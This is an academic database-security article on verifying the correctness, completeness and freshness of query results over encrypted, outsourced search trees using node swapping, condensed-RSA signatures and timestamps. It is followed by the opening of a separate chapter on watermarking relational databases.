(a) The B+-tree on CustomerName: root node 0 (key John) points to internal nodes 1 (keys Bob, Ha) and 2 (keys Rose, Trang); the leaf nodes are 3 (Alice, Anne), 4 (Bob, Carol), 5 (Ha), 6 (John, Linh), 7 (Rose, Son), and 8 (Trang).

(b) B+Table and B+EncryptedTable:

NID   Node                  NID   EncryptedNode
0     (1,John,2,-,-1)       0     D0a1n2g3Kh75nhs&
1     (3,Bob,4,Ha,5)        1     T9&8ra§ÖÄajh³q91
2     (6,Rose,7,Trang,8)    2     H&$uye”μnÜis57ß@
3     (Alice,Anne,4)        3     L?{inh*ß²³&§gnaD
4     (Bob,Carol,5)         4     Wh09a/[%?Ö*#Aj2k
5     (Ha,-,6)              5     j8Hß}[aHo$§angμG
6     (John,Linh,7)         6     #Xyi29?ß~R@€>Kh
7     (Rose,Son,8)          7     ~B³!jKDÖbd0K3}%§
8     (Trang,-,-1)          8     T-§μran&gU19=75m
gradually, together with statistical methods, data mining techniques, and so forth, the server can rebuild the whole tree structure and infer sensitive information from the encrypted database, hence data confidentiality can also be compromised. Besides, during the querying, the user also learns that there are at least two other customers, named John and Bob, in the database, so data privacy is not satisfied (note, however, that we will not address the data privacy problem in this article). Although Damiani et al. (2003) proposed an approach to outsourced tree-based index structures, it unfortunately has some security flaws that may compromise the desired security objectives (Dang, 2005, 2006b). Lin and Candan (2004) and Dang (2006a) developed algorithms based on access redundancy and node-swapping techniques to address security issues of outsourced tree-indexed
data. We briefly summarize their solutions in the rest of this section. Obviously, as private data is outsourced with search trees, the tree structure and data should all be confidential. As shown in Damiani et al. (2003), encrypting each tree node as a whole is preferable because protecting a tree-based index by encrypting each of its fields would disclose to the server the ordering relationship between the index values. Lin and Candan’s (2004) approach also follows this solution and, like others (Dang, 2005, 2006a; Damiani et al., 2003), the unit of storage and access in their approach is also a tree node. Each node is identified by a unique node identifier (NID). The original tree is then stored at the server as a table with two attributes: NID and an encrypted value representing the node content. Consider an example: Figure 3a shows a B+-tree built on an attribute CustomerName; Figure 3b
shows the corresponding plaintext and encrypted table used to store the B+-tree at the external server. As we can see, that B+-tree is stored at the external server as a table over schema B+EncryptedTable = {NID, EncryptedNode}. Based on the above settings, Lin and Candan (2004) proposed an approach to oblivious traversal of outsourced search trees using two adjustable techniques: access redundancy and node swapping.
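To make this storage model concrete, the following is a minimal sketch of how whole tree nodes could be encrypted and stored as rows of B+EncryptedTable = {NID, EncryptedNode}. It is illustrative only: the toy SHA-256-based stream cipher merely stands in for a real block cipher (the prototype described later in this article used DES), and all names and the node serialization are assumptions.

```python
# Minimal sketch (illustrative names): storing a B+-tree as a table over
# {NID, EncryptedNode}, with whole nodes encrypted as single units.
# The SHA-256-based stream cipher below only stands in for a real block cipher.
import hashlib

def _keystream(key: bytes, nid: int, length: int) -> bytes:
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nid.to_bytes(8, "big")
                              + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def encrypt_node(key: bytes, nid: int, node: str) -> bytes:
    data = node.encode()
    return bytes(a ^ b for a, b in zip(data, _keystream(key, nid, len(data))))

def decrypt_node(key: bytes, nid: int, ciphertext: bytes) -> str:
    ks = _keystream(key, nid, len(ciphertext))
    return bytes(a ^ b for a, b in zip(ciphertext, ks)).decode()

# A few plaintext nodes of Figure 3a, each row keyed by its NID.
plain_nodes = {0: "(1,John,2,-,-1)", 1: "(3,Bob,4,Ha,5)", 5: "(Ha,-,6)"}
owner_key = b"data-owner-encryption-key"
encrypted_table = {nid: encrypt_node(owner_key, nid, node)
                   for nid, node in plain_nodes.items()}
assert decrypt_node(owner_key, 1, encrypted_table[1]) == "(3,Bob,4,Ha,5)"
```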
Access Redundancy

Whenever a user accesses a node, called the target node, it asks the server for a set of m-1 randomly selected nodes in addition to the target node. Hence, the probability that the server can guess the target node is 1/m. This technique is different from those presented in Damiani et al. (2003), where only the target node is retrieved (which may reveal the tree structure, as shown in Dang, 2005, 2006b). Besides the access redundancy, it also bears another weakness: it can leak information on the target node position. This is easy to observe: multiple access requests for the root node will reveal its position by simply calculating the intersection of the redundancy sets of the requests. If the root position is disclosed, there is a high risk that its child nodes (and also the whole tree structure) may be exposed (Lin & Candan, 2004). This deficiency is overcome by secretly changing the target node's address after each time it is accessed.

Node Swapping

Each time a user requests to access a node from the server, it asks for a redundancy set of m nodes consisting of at least one empty node along with the target one. The user then: (1) decrypts the target node, (2) manipulates its data, (3) swaps it with the empty node, and (4) re-encrypts all m nodes and writes them back to the server. Note that this technique must re-encrypt nodes using a different encryption scheme/key (see Lin & Candan, 2004, for details). The authors proved that, with this technique, the possible position of the target node is randomly distributed over the data storage space at the untrusted server, and thus the weakness of the access redundancy technique is overcome.

Additional Procedures

To realize oblivious traversal of outsourced search trees, some more critical issues must also be addressed:

• Managing the root node address: The authors proposed to employ a special entry node called SNODE whose NID and decryption key are known to all valid users. It keeps pointers ROOTS pointing to the root nodes of all outsourced search trees that the user can access.
• Managing empty node lists: Empty nodes are stored in hidden linked lists. To help users find the empty nodes, two other types of pointers are also stored in the SNODE: EHEADS and ETAILS point to the heads and tails of the empty node lists, respectively.
• Random choice for redundancy sets: A redundancy set consists of the target node, an empty node, and m-2 randomly selected nodes. To enable users to do this, the SNODE records the range of NIDs of nodes in the data storage space at the server. The user can then generate m-2 random NIDs within this range.
• Managing the tree structure integrity: This aims to maintain node/parent-node relationships after node swapping. The first solution is to find the empty node to be swapped with the child node and update the parent node accordingly before actually swapping the child node. The second solution is to let users keep track of all nodes from the root down, deferring all the swaps until the node containing the data is accessed.
• Concurrency control in the multi-user environment: The authors also presented a solution to concurrency control without deadlocks. The main idea of the proposed solution is to organize the nodes in the data storage space at the server into d levels, where each level requires an empty node list to store the empty nodes at that level. Besides, all users access nodes in some fixed predetermined order, ensuring deadlock-free access in a multi-user environment.

See Lin and Candan (2004) for detailed discussions about the proposed solutions to all of these critical issues.
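The following sketch puts the access redundancy and node-swapping steps together for a single node access. It is a simplification under stated assumptions: the server is modeled as an in-memory dictionary, the encryption and decryption routines are passed in as callables, and the bookkeeping for parent pointers, per-level empty-node lists, and concurrency control discussed above is deliberately omitted; all names are illustrative.

```python
# Sketch of one oblivious node access with access redundancy and node swapping.
# The server is modeled as a dict NID -> ciphertext; parent-pointer updates and
# concurrency control are omitted. Names are illustrative.
import random

def access_node(server, target_nid, empty_nids, all_nids, m, decrypt, encrypt):
    empty_nid = empty_nids.pop()                       # one empty node per request
    others = random.sample([n for n in all_nids
                            if n not in (target_nid, empty_nid)], m - 2)
    redundancy_set = [target_nid, empty_nid] + others  # server can only guess 1/m
    random.shuffle(redundancy_set)
    fetched = {n: decrypt(n, server[n]) for n in redundancy_set}

    contents = fetched[target_nid]                     # (1)-(2) decrypt and use it
    fetched[empty_nid] = contents                      # (3) swap into the empty slot
    fetched[target_nid] = "EMPTY"                      # old slot becomes empty
    empty_nids.append(target_nid)

    for n in redundancy_set:                           # (4) re-encrypt and write back
        server[n] = encrypt(n, fetched[n])
    return contents, empty_nid                         # caller fixes the parent pointer
```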
Although Lin and Candan’s (2004) approach only supports oblivious tree search operations, the two above techniques have served as the basis for our further investigation. Based on the access redundancy and node-swapping techniques, in Dang (2006a) we developed practical algorithms for privacy-preserving search, insert, delete, and modify operations that can be applied to a variety of dynamic outsourced tree-based index structures and the unified user model where data owners are also sole users of the system (see Mykletun et
al., 2004; Du & Atallah, 2000; Dang, 2006b, for more details about ODBS models). Although our previous work provided vanguard solutions for this problem with sound empirical results, it did not consider the query assurance problem. In the next section we will extend our previous work to address this problem. Note, however, that under the unified user model it is not necessary to consider, in the remainder of this article, the clients shown in Figure 1. The key "actors" in our concerned ODBS model now consist only of the data owners and the outsourcing database server.
QUERY ASSURANCE FOR OUTSOURCED TREE-INDEXED DATA

In this section, we present an extension of our previous work in Dang (2006a), which introduced solutions to the problems of data confidentiality and user privacy in the ODBS model (with respect to the unified user model), in order to incorporate solutions for ensuring the correctness, completeness, and freshness of the query results. The next section will detail the experimental results with real datasets.
Figure 4. EncryptedTable with tree node contents' signatures (the table over schema {NID, EncryptedNode, Signature} for NIDs 0-8)
Correctness Guarantees

As introduced in the first section, to guarantee the correctness of the query result set, the system must provide a means for the user to verify that the received data originated, unmodified, from the data owner. As analyzed in previous sections, the state of the art employs public key cryptography to deal with this problem. With respect to our concerned ODBS model, where data privacy considerations are omitted and only a single signer (i.e., only one data owner, or multiple data owners using the same signature scheme) participates in the query processing, the RSA-based signature scheme is the most suitable, as already discussed. In our context, outsourced tree-indexed data is stored at the server side as described in the previous section, that is, as a table over schema EncryptedTable = {NID, EncryptedNode}. Before outsourcing the data, the data owner computes the hash h(m) of each encrypted node m. Here, h() denotes a cryptographically strong hash function (e.g., SHA-1). The data owner then "signs" each encrypted node m by encrypting h(m) with its private/secret key sk and stores the signatures together with EncryptedTable at the server. The table schema stored at the server therefore becomes EncryptedTable = {NID, EncryptedNode, Signature} (see Figure 4).4 With these settings, users5 can then verify each returned node using the data owner's public key pk, hence ensuring the correctness of the result set. Although this naive approach ensures the security objective, it is expensive because the number of signatures to verify equals the redundancy set size. To solve this issue, we employ the condensed-RSA digital signature scheme, which relies on RSA being multiplicatively homomorphic, as presented in the previous section: Given t input encrypted nodes {m1, ..., mt} (the redundancy set) and their corresponding signatures {s1, ..., st}, the server computes a condensed-RSA signature s1,t as the product of these
individual signatures and sends it together with the redundancy set to the user. The user, in turn, can verify the condensed signature s1,t using the hashes computed from all received nodes (in the corresponding redundancy set), as shown in the previous section. With this method, not only is the correctness of the query result ensured, but both communication and computation costs are also greatly reduced. Note that in this case the server has to send the user only one condensed-RSA signature s1,t for verification instead of t individual ones. In the following section we will show the experimental results.
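As a concrete illustration of this verification equation, here is a small sketch of condensed-RSA signing, aggregation, and checking. The RSA parameters below are deliberately tiny toy values (the prototype described later uses 1024-bit RSA with SHA-1), the hash is reduced modulo n only because of that toy modulus, and all names are illustrative.

```python
# Sketch of condensed-RSA over a redundancy set, with toy RSA parameters only.
import hashlib

p, q = 61, 53
n, e, d = p * q, 17, 413            # e*d = 1 mod lcm(p-1, q-1) = 780

def h(message: bytes) -> int:
    return int.from_bytes(hashlib.sha1(message).digest(), "big") % n

def sign(message: bytes) -> int:    # data owner, private exponent d
    return pow(h(message), d, n)

def condense(signatures) -> int:    # server: product of individual signatures
    s = 1
    for sig in signatures:
        s = (s * sig) % n
    return s

def verify(messages, condensed) -> bool:   # user: (s_{1,t})^e ?= prod h(m_i) mod n
    expected = 1
    for m in messages:
        expected = (expected * h(m)) % n
    return pow(condensed, e, n) == expected

nodes = [b"encrypted-node-17", b"encrypted-node-42", b"encrypted-node-99"]
assert verify(nodes, condense([sign(m) for m in nodes]))
```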
Completeness Guarantees

Completeness guarantees mean that the server did not omit any tuples matching the query conditions. In our context, when a user asks the server for a redundancy set A of t nodes, A = {m1, ..., mt}, and the server returns a set R of t nodes, R = {n1, ..., nt}, the user must be able to verify that A = R. As presented in the previous section, a user asks for encrypted nodes (at the server side) through their NIDs. Therefore, the user should be provided with a means of verifying that the NID of each mi, i = 1..t, equals the NID of the corresponding ni. To ensure this, our solution is embarrassingly simple: each NID is encrypted together with the corresponding node contents, and this encrypted value is stored at the server side together with its signature. Users can then check whether the server returned the NIDs (in the redundancy set) that they actually requested (the completeness) as well as verify the correctness of the query result (as shown in the section "Correctness Guarantees"). This idea is illustrated in Figure 5. In more detail, Figure 5 sketches the settings for verifying the completeness (and correctness) guarantees of the system. First, the encrypted value for the attribute EncryptedNode also includes the NID of its corresponding node (for example, in the first row, the encrypted value also includes the value 0). Second, the data owner signs
Figure 5. Settings for verifying completeness guarantees: in B+EncryptedTable, each NID is encrypted together with the corresponding node contents; the signatures guarantee the correctness and the encrypted NIDs guarantee the completeness
each encrypted node using the RSA signature scheme, then stores the signature (e.g., s0) together with the NID and its corresponding encrypted value as described in the previous section. Note, however, that verifying the completeness and the correctness must be carried out together; that is, the user cannot omit either of them and still be assured that the other is guaranteed. The same holds for the freshness guarantees that we present below.
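A minimal sketch of this joint check is given below. It assumes, purely for illustration, that each plaintext node is serialized as "NID|contents" and that the condensed-RSA correctness check is performed by the caller; the function and variable names are hypothetical.

```python
# Sketch of the completeness check for a redundancy set, assuming each plaintext
# node starts with its own NID (encrypted together with the node contents).
def check_completeness(requested_nids, returned_rows, decrypt):
    """returned_rows: list of (nid, ciphertext, signature) rows from the server."""
    if sorted(nid for nid, _, _ in returned_rows) != sorted(requested_nids):
        return False                              # rows omitted or substituted
    for nid, ciphertext, _ in returned_rows:
        embedded_nid, _, _contents = decrypt(ciphertext).partition("|")
        if int(embedded_nid) != nid:              # NID hidden inside the ciphertext
            return False                          # must match the NID asked for
    return True
```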
Freshness Guarantees

As discussed previously, with dynamic outsourced databases, ensuring only the correctness and completeness of the result set is not enough. Apart from those, the system must also provide a means for users to verify that the received nodes come from the most recent database state, not from older ones. Whether motivated by clear cost incentives for dishonest behavior or because of intrusions/viruses, the server may return obsolete nodes to users, nodes that do not truly reflect the state of the outsourced database at query time. This is no less important a problem, and it must also be solved to make the ODBS model viable. Narasimha and Tsudik (2006) mention this problem and outline a possible solution based on MHTs, but no cost evaluation is given. Note
that MHT-based approaches to the ODBS model are quite expensive, especially for dynamic outsourced tree-indexed data (Narasimha & Tsudik, 2006). In this section, we propose a vanguard solution to this problem, and a comprehensive evaluation of all concerned security objectives will be presented in the next section. To solve the problem of freshness guarantees, users must be able to verify that the server returned the most up-to-date versions of the required tree nodes (at the time it processed the query). Our solution is also quite simple, yet sound and complete, and is based on timestamps: a timestamp of each child node is stored at its parent node. This timestamp changes only when the child node's contents (but not its address) are updated. In other words, a node keeps timestamps of all of its child nodes, and a user can then check (from the root node) whether the server returned the latest version of the required node as follows: in accessing the root, the user knows in advance all timestamps of its child nodes, and when a child node is returned, he or she can check whether this node's timestamp equals the known value, and so on. This process is carried out for every tree node required by the user. There is, however, one question that arises: How can users check the root's timestamp? The answer is not complicated: In the settings for access redundancy and node-swapping
Figure 6. Settings for verifying freshness guarantees: in B+EncryptedTable, each encrypted node also includes its NID and the timestamps of its child nodes; the signatures guarantee the correctness, the encrypted NIDs the completeness, and the encrypted timestamps the freshness
techniques, there is a special node called SNODE that keeps some metadata and the root's address (see the previous section). The SNODE's address and its decryption key are known to all qualified users. Besides, in the context of our concerned ODBS model, only data owners are able to make changes to, as well as to query, their outsourced data. Therefore, for the sake of freshness guarantees, the SNODE keeps the timestamp of the root in addition to the other information mentioned before (this timestamp changes only when the root contents are updated by a data owner), and each qualified user (i.e., the other data owners) is informed about the timestamp of the SNODE (by the data owner who made the changes6). Moreover, with the settings for access redundancy and node-swapping techniques, besides the root's address and timestamp, the users must also use other metadata in the SNODE to perform operations on the tree (see Dang, 2006a, for detailed discussions of the outsourced tree operations). Hence, it is vitally important that the SNODE's timestamp is communicated to all users as discussed above to ensure the freshness of the result set. Overall, with all of the above settings, all three security objectives of the query assurance problem in the concerned ODBS model, that is, the correctness, completeness, and freshness
guarantees of the query result, can be effectively verified. Note that the encrypted value representing the corresponding node contents now includes not only its NID, but also the timestamps of the child nodes. The corresponding signature is computed over this final encrypted value. This is illustrated in Figure 6.
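The timestamp check can be pictured as part of the root-to-leaf traversal, as in the sketch below. The data structures (a node exposing its own timestamp and the recorded timestamps of its children), the SNODE fields, and the function names are all assumptions made for illustration; the correctness and completeness checks are folded into the fetch_and_verify callable.

```python
# Sketch of the timestamp (freshness) check during a root-to-leaf traversal.
# fetch_and_verify is assumed to decrypt a node and perform the correctness and
# completeness checks; node layout and SNODE fields are illustrative.
def traverse_with_freshness(fetch_and_verify, snode):
    expected_ts = snode["root_timestamp"]        # root timestamp kept in SNODE
    nid = snode["root_nid"]
    path = []
    while nid is not None:
        node = fetch_and_verify(nid)
        if node["timestamp"] != expected_ts:     # stale or replayed node version
            raise ValueError(f"freshness violation at node {nid}")
        path.append(node)
        nid, expected_ts = _next_child(node)     # child NID and its recorded timestamp
    return path

def _next_child(node):
    # Placeholder for the real key-based search step; (None, None) at a leaf.
    if not node["child_ts"]:
        return None, None
    return next(iter(node["child_ts"].items()))
```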
EXPERIMENTAL RESULTS

To confirm the theoretical analyses carried out in previous sections and establish the practical applicability of our approach, we implemented a prototype system and evaluated the proposed solutions with real datasets. For all experiments, we used two-dimensional datasets extracted from the SEQUOIA dataset at http://www.rtreeportal.org/spatial.html. The SEQUOIA dataset consists of two-dimensional points of the format (x, y), representing the locations of 62,556 California place names. We extracted five sub-datasets of 10K, 20K, 30K, 40K, and 50K points from the SEQUOIA dataset for the experiments. To manage the spatial points, we employed two-dimensional kd-trees due to their simplicity. For all the trees, we set the maximum number M of data items that a leaf node can keep to 50 and
Figure 7. A screen shot: Costs of point and range queries with condensed-RSA scheme wrt. 50K points dataset
the minimum fill factor to 4%. This means that each tree leaf node must contain at least two points and can store up to 50 points. Furthermore, the tree was stored in a data storage space with a 22,500-node capacity (see Figure 7), divided into 15 levels of 1,500 nodes each (see Dang, 2006a; Lin & Candan, 2004, for the detailed meanings of these settings). Our prototype system consisted of a single P4 CPU 2.8GHz/1GB RAM PC running Windows Server 2003. Both user and server were accommodated on the same computer, so for all experiments we report the average time to complete a user request, which represents the average CPU cost of each user request, and we analyze the averaged IO and communication costs. In addition, all programs were implemented using C#/Visual Studio .NET 2003, and we employed the DES algorithm for the encryption of data and the RSA signature scheme (1,024-bit key) with SHA-1 hashing for the digital signatures. We did experiments with all major basic operations, including search (for both point and range queries) and updates (inserts and deletes). Note
that modify operations are combinations of inserts and deletes (Dang, 2005, 2006a). In addition, because there is no previous work built on the same or a similar scheme and addressing the same problem, we had to build our scheme from scratch, and we did experiments to evaluate our solutions to the query assurance issue on the basis of both the condensed-RSA signature scheme and the naive/standard RSA signature scheme. All the security objectives of the query assurance issue (i.e., correctness, completeness, and freshness guarantees) were taken into account. The details are as follows. Initially, we did experiments with the largest dataset, 50K points, for insert, delete, point, and range queries in order to see the performance of both the naive and the condensed RSA-based solutions. The redundancy set size was set to 4 for these tests. Figure 7 shows a screen shot as we built the tree, stored it at the server, and performed point and range queries with the condensed-RSA scheme on the largest dataset. In Figure 8, we present the experimental results concerning the CPU cost for all operations. It is clearly shown that the
CPU cost of the condensed-RSA scheme is much better than that of the naïve-RSA scheme. Note that the average number of accessed nodes (i.e., the IO cost) is the same for both, but the communication cost of the condensed-RSA scheme is also lower, by (Redundancy_set_size - 1) * RSA_signature_size. This is because, with the condensed-RSA scheme, the server has to send the user only one condensed signature, while it has to send Redundancy_set_size
signatures with respect to the naïve-RSA scheme. Verifying more signatures is the main reason for a higher CPU cost of the latter. Furthermore, to see the effect of different database sizes on the performance for each sub-dataset, we ran 100 separate queries with the redundancy set size being set to 4, and calculated averaged values for CPU time. With inserts, deletes, and point queries, we randomly chose 100 points from the corresponding dataset as the queries. With
range queries, we randomly chose 100 squares as the queries. The side of each square was chosen to be 1% of the data space side length (if the dataset were uniformly distributed, this value would maintain a selectivity of 0.01% for these range queries). The experimental results are shown in Figure 9. As we can see, the CPU cost saving of the condensed-RSA scheme over the naïve-RSA scheme is high for all kinds of queries, over 30% at a minimum. Again, as mentioned above, although the average number of accessed nodes is equal for both schemes, the communication cost of the condensed-RSA scheme is better than that of the naïve-RSA scheme.
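As a quick worked example of that communication saving, using the settings reported above (a redundancy set of size 4 and 1,024-bit RSA signatures):

```python
# Worked example of the communication saving, using the reported settings:
# redundancy set of size 4 and 1,024-bit RSA signatures.
redundancy_set_size = 4
rsa_signature_bytes = 1024 // 8                       # 128 bytes per signature
naive = redundancy_set_size * rsa_signature_bytes     # 4 signatures = 512 bytes
condensed = 1 * rsa_signature_bytes                   # 1 condensed signature = 128 bytes
print(naive - condensed)                              # (4 - 1) * 128 = 384 bytes saved per access
```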
Security Analysis Briefings

The security correctness of our proposed solutions to all three security objectives in our holistic approach to the query assurance problem in the ODBS model follows directly from the discussions and analyses in the previous sections. However, one may question the degree of security of the access redundancy and node-swapping techniques introduced in Lin and Candan (2004) and of their modified versions for dynamic outsourced search trees (Dang, 2005, 2006a). The proof of security correctness therefore focuses on that previous work. Fortunately, Dang (2006a) and Lin and Candan (2004) did prove that when users access the outsourced tree-indexed data, the untrusted server is not able to determine whether any two queries are identical and, for two different queries, it is also not able to differentiate the distributions of the queries' redundancy sets in polynomial time. The former protects the queries from the server, and the latter protects the tree structure. In summary, to conclude this section we emphasize that it has been mathematically proven in Lin and Candan (2004) and Dang (2006a) that our approach, based on the access redundancy and node-swapping techniques, is computationally secure in protecting both the queries and the tree structure from a polynomial-time server.
Hence, it is quite safe to claim that the solutions proposed in this article, which extend the previous work, are full-fledged and can be applied to real-world ODBS models.
CONCLUSION AND FUTURE WORK

In this article, we explored the problem of query assurance in the outsourced database service (ODBS) model. Concretely, we extended our previous work (Dang, 2006a) and presented a full-fledged solution to the problem of ensuring the correctness, completeness, and freshness of basic operations (insert, delete, modify, point, and range queries) on dynamic outsourced tree-indexed data. Experimental results with real multidimensional datasets have confirmed the efficiency of our proposed solution. Notably, to the best of our knowledge, none of the previous work has dealt with all three of the above security issues of query assurance in the ODBS model with respect to dynamic outsourced trees. Our work therefore provides a vanguard solution to this problem. This work can also be applied to non-tree-indexed data outsourced to untrusted servers (with settings like those of Damiani et al., 2003; Dang, 2006a). Our future work will focus on evaluating the efficiency of the proposed solutions in real-world applications and on addressing related open research issues. In particular, supporting multiple data owners' signatures (i.e., multiple signers) is a generalization of the solution proposed in this article, and an efficient solution to this problem is still open. Moreover, as discussed in the section "Related Work," auditing and accountability for the ODBS model, as well as computer-crime-related issues and the data privacy problem, should be addressed, and they will be among our future research activities of great interest. Another problem that also attracts us is how to deal with over-redundancy of the result set returned from the server, that is, the
server sends the user more than what should be returned in the answers. This may cause a user to pay more for communication and to incur higher computation costs, so this issue needs to be investigated carefully.
ACKNOWLEDGMENT

The author would like to thank the anonymous referees for their insightful reviews with interesting comments and suggestions.

REFERENCES

Asonov, D. (2001). Private information retrieval: An overview and current trends. Proceedings of the ECDPvA Workshop (pp. 889-894), Vienna, Austria.

Axelrod, C.W. (2004). Outsourcing information security. Norwood, MA: Artech House.

Boneh, D., Gentry, C., Lynn, B., & Shacham, H. (2003). Aggregate and verifiably encrypted signatures from bilinear maps. Proceedings of the International Conference on the Theory and Applications of Cryptographic Techniques (pp. 416-432), Warsaw, Poland.

Bouganim, L., & Pucheral, P. (2002). Chip-secured data access: Confidential data on untrusted servers. Proceedings of the 28th International Conference on Very Large Data Bases (pp. 131-142), Hong Kong.

Burmester, M., Desmedt, Y., Wright, R.N., & Yasinsac, A. (2004). Accountable privacy. Proceedings of the 12th International Workshop on Security Protocols (pp. 83-95), Cambridge, UK.

Castano, S., Fugini, M.G., Martella, G., & Samarati, P. (1995). Database security. Boston: Addison-Wesley/ACM Press.

Chang, Y.-C., & Mitzenmacher, M. (2004). Privacy preserving keyword searches on remote encrypted data. Cryptology ePrint Archive Report 2004/051.

Chor, B., Goldreich, O., Kushilevitz, E., & Sudan, M. (1995). Private information retrieval. Proceedings of the 36th Annual IEEE Symposium on Foundations of Computer Science (pp. 41-50), Milwaukee, WI.

Damiani, E., Vimercati, S.D.C., Jajodia, S., Paraboschi, S., & Samarati, P. (2003). Balancing confidentiality and efficiency in untrusted relational DBMSs. Proceedings of the 10th ACM Conference on Computer and Communication Security (pp. 93-102), Washington, DC.

Dang, T.K. (2003). Semantic based similarity searches in database systems: Multidimensional access methods, similarity search algorithms. PhD Thesis, FAW-Institute, University of Linz, Austria.

Dang, T.K. (2005). Privacy-preserving basic operations on outsourced search trees. Proceedings of the IEEE International Workshop on Privacy Data Management, Tokyo.

Dang, T.K. (2006a). A practical solution to supporting oblivious basic operations on dynamic outsourced search trees. International Journal of Computer Systems Science and Engineering, 21(1), 53-64.

Dang, T.K. (2006b). Security protocols for outsourcing database services. Information and Security: An International Journal, 18, 85-108.

Du, W., & Atallah, M.J. (2000). Protocols for secure remote database access with approximate matching. Proceedings of the 7th ACM Conference on Computer and Communications Security, 1st Workshop on Security and Privacy in E-Commerce, Greece.

Fong, K.C.K. (2003). Potential security holes in Hacigümüs' scheme of executing SQL over encrypted data. Retrieved from http://www.cs.siu.edu/~kfong/research/database.pdf

Gertner, Y., Ishai, Y., Kushilevitz, E., & Malkin, T. (1998). Protecting data privacy in private information retrieval schemes. Proceedings of the 30th Annual ACM Symposium on Theory of Computing (pp. 151-160).

Hacigümüs, H., Iyer, B.R., Li, C., & Mehrotra, S. (2002a). Executing SQL over encrypted data in the database-service-provider model. Proceedings of the ACM SIGMOD Conference (pp. 216-227), Madison, WI.

Hacigümüs, H., Mehrotra, S., & Iyer, B.R. (2002b). Providing database as a service. Proceedings of the 18th International Conference on Data Engineering (pp. 29-40), San Jose, CA.

Joux, A., & Nguyen, K. (2001). Separating decision Diffie-Hellman from Diffie-Hellman in cryptographic groups. Cryptology ePrint Archive Report 2001/003.

Lin, P., & Candan, K.S. (2004). Hiding traversal of tree structured data from untrusted data stores. Proceedings of the 2nd International Workshop on Security in Information Systems (pp. 314-323), Porto, Portugal.

Merkle, R.C. (1980). Protocols for public keys cryptosystems. Proceedings of the IEEE Symposium on Research in Security and Privacy (pp. 122-134), Oakland, CA.

Mykletun, E., Narasimha, M., & Tsudik, G. (2004). Authentication and integrity in outsourced databases. Proceedings of the 11th Annual Network and Distributed System Security Symposium, San Diego, CA.

Narasimha, M., & Tsudik, G. (2006). Authentication of outsourced databases using signature aggregation and chaining. Proceedings of the 11th International Conference on Database Systems for Advanced Applications (pp. 420-436), Singapore.

Nguyen, V.H., Dang, T.K., Son, N.T., & Kueng, J. (2007). Query assurance verification for dynamic outsourced XML databases. Proceedings of the International Symposium on Frontiers in Availability, Reliability and Security (FARES) (pp. 689-696), Vienna, Austria.

Pang, H.H., & Tan, K.-L. (2004). Authenticating query results in edge computing. Proceedings of the 20th International Conference on Data Engineering (pp. 560-571), Boston.

Pang, H.H., Jain, A., Ramamritham, K., & Tan, K.-L. (2005). Verifying completeness of relational query results in data publishing. Proceedings of the SIGMOD Conference (pp. 407-418).

PRIME Project. (2004). The PRIME Project: Privacy and identity management for Europe. Retrieved from https://www.prime-project.eu

Sion, R. (2005). Query execution assurance for outsourced databases. Proceedings of the 31st International Conference on Very Large Data Bases (pp. 601-612), Trondheim, Norway.

Smith, S.W., & Safford, D. (2001). Practical server privacy with secure coprocessors. IBM Systems Journal, 40(3), 683-695.

Thuraisingham, B. (2005). Database and applications security: Integrating information security and data management. Auerbach.

Umar, A. (2004). Information security and auditing in the digital age: A managerial and practical perspective. NGE Solutions.
ENDNOTES

1. In this article, however, we will deal with a less complicated ODBS model.
2. Note that, although privacy-related issues have been widely investigated (PRIME Project, 2004), the question "what is the complexity of the privacy problem?" is still open inasmuch as the answer is quite different, depending not only on technology, but also on sociology and politics (Thuraisingham, 2005).
3. In one of our very recent papers (Nguyen et al., 2007), which was written and published after this article had been accepted for publication, we also employed the timestamps as proposed in this article in order to ensure the query result freshness of dynamic outsourced XML databases.
4. Note that Figure 4 depicts only "real" tree nodes, but the empty nodes that are not shown here are also stored in the same table, EncryptedTable, over the same schema at the server side (see Dang, 2006a, for more information).
5. Here, in the unified user model, a user is also one of the data owners.
6. Obviously, the data owner knows who the valid users/other data owners are, and so this solution is well applicable.
This work was previously published in Information Resources Management Journal, Vol. 21, Issue 1, edited by M. KhosrowPour, pp. 59-76, copyright 2008 by IGI Publishing (an imprint of IGI Global).
Chapter 7.16
A Multiple-Bits Watermark for Relational Data

Yingjiu Li, Singapore Management University, Singapore
Huiping Guo, California State University at Los Angeles, USA
Shuhong Wang, University of Wollongong, Australia
ABSTRACT

At the heart of the information economy, commercially and publicly useful databases must be sufficiently protected from pirated copying. Complementary to the Database Protection Act, database watermarking techniques are designed to thwart pirated copying by embedding owner-specific information into databases so that the ownership of pirated copies of protected databases can be claimed if the embedded information is detected. This article presents a robust watermarking scheme for embedding a multiple-bits watermark into numerical attributes in database relations. The scheme is robust in the sense that it provides an upper bound for the probability that a valid watermark is detected from unmarked data, or a fictitious secret key is discovered from
pirated data. This upper bound is independent of the size of the data. The scheme is extended to database relations without primary-key attributes to thwart attribute-related attacks. The scheme is also extended to multiple watermarks for defending additive attacks and for proving joint ownership.
INTRODUCTION

With the development of information technology, databases are becoming increasingly important in a wide variety of applications such as parametric specifications, surveys, and life sciences. While demand for the use of databases is growing, pirated copying has become a severe threat to such databases due to the low cost of copying and
the high values of the target databases. To fight against pirated copying, database watermarking techniques are designed to embed owner-specific information into database relations; when a pirated copy is found, the owner can extract the embedded information and use the detection process to assert the ownership of data. This complements the effort of the Database Protection Act (Vaas, 2003) as people realize that the law does not provide sufficient protection to valuable databases (Gray & Gorelick, 2004). While watermarking multimedia data has long been rigorously studied (Cox, Miller, & Bloom, 2001; Johnson, Duric, & Jajodia, 2000; Katzenbeisser & Petitcolas, 2000), the approaches developed for multimedia watermarking cannot be directly applied to databases because of the difference in data properties. In general, database relations differ from multimedia data in significant ways and hence require a different class of information-hiding mechanisms. Unlike multimedia data whose components are highly correlated, database relations consist of independent objects or tuples. The tuples can be added, deleted, or modified frequently in either benign updates or malicious attacks. No existing watermarking techniques for multimedia data are designed to accommodate such tuple operations. Perhaps the most well-known scheme for watermarking relational data is the one proposed by Agrawal and Kiernan (2002). For convenience, we call it the AK scheme. The main idea of the AK scheme is to change a small portion of numerical data according to a secret key such that the change can be detected for ownership proof. Without access to the secret key, a pirate cannot localize exactly where the change is made. It is difficult for a pirate to confuse the ownership detection unless he or she introduces an intolerable error to the underlying data. The AK scheme can be used in many real-world applications such as watermarking parametric specifications, surveys, and life-science data (Agrawal, Haas, & Kiernan, 2003; Agrawal & Kiernan).
